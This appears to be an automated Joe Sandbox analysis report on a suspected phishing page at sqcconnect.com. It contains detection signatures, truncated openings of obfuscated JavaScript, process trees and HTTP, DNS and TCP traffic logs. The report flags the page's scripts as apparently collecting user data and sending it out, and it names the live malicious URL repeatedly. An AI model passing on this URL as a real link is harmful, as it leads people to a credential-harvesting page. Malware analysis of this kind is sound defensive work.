Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f

Overview

General Information

Sample URL:https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
Analysis ID:1576800
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
HTML page contains obfuscated javascript
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 3892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2000,i,529291151797624790,14523265162952734100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 2.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sqcconnect.com/editor/scripts.js... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be collecting sensitive user information and sending it to external domains, which is highly suspicious. While some of the behaviors could be related to legitimate functionality like analytics or error reporting, the overall aggressive and opaque nature of the script raises significant security concerns.
Source: https://sqcconnect.com/editor/f.jsHTTP Parser: const a0_0xce11a=a0_0x25f2;(function(_0x3a1515,_0x18fbd4){const _0x63badc=a0_0x25f2,_0x2e46af=_0x3a1
Source: https://sqcconnect.com/editor/scripts.jsHTTP Parser: function a0_0x4347() { const _0xc84a2d = ['yncScriptI', 'AAABCAYAAA', 'reasons', 'PVyGZ', 'wGPbe', '
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f HTTP/1.1Host: sqcconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b31c6b081a48&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b31c6b081a48&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modula.com HTTP/1.1Host: api.faviconkit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f37b31c6b081a48/1734446759969/c1142f163fc1c29288a0cfa12faf7d55d96029302270ed9bae2be5d9724f6269/5PlURqfpRSBIM7f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modula.com HTTP/1.1Host: api.faviconkit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f HTTP/1.1Host: sqcconnect.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /editor/scripts.js HTTP/1.1Host: sqcconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /editor/f.js HTTP/1.1Host: sqcconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/kt8az/0x4AAAAAAA0Aa6igGlTE6pvw/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /editor/f.js HTTP/1.1Host: sqcconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /editor/scripts.js HTTP/1.1Host: sqcconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b3a32d2d4387&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/kt8az/0x4AAAAAAA0Aa6igGlTE6pvw/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /editor/save HTTP/1.1Host: sqcconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /editor/anti HTTP/1.1Host: sqcconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
Source: global trafficHTTP traffic detected: GET /modula.com/144 HTTP/1.1Host: api.faviconkit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sqcconnect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modula.com/144 HTTP/1.1Host: api.faviconkit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: sqcconnect.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: api.faviconkit.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3492sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdXsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 14:46:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 7TpeVpuKHhHItd5684ulMuTx7MvyiPZzIY8=$+PJ7hVdDz+qldscnServer: cloudflareCF-RAY: 8f37b34a2d5117ad-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 14:46:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: aMSV1nGuGqIzdpXHgJ4SHeYgIVEgNK6hhHM=$9yNiLhgIp1hD9TPycache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f37b378a82c0cb0-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_80.1.drString found in binary or memory: https://api.faviconkit.com/modula.com/144
Source: chromecache_80.1.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
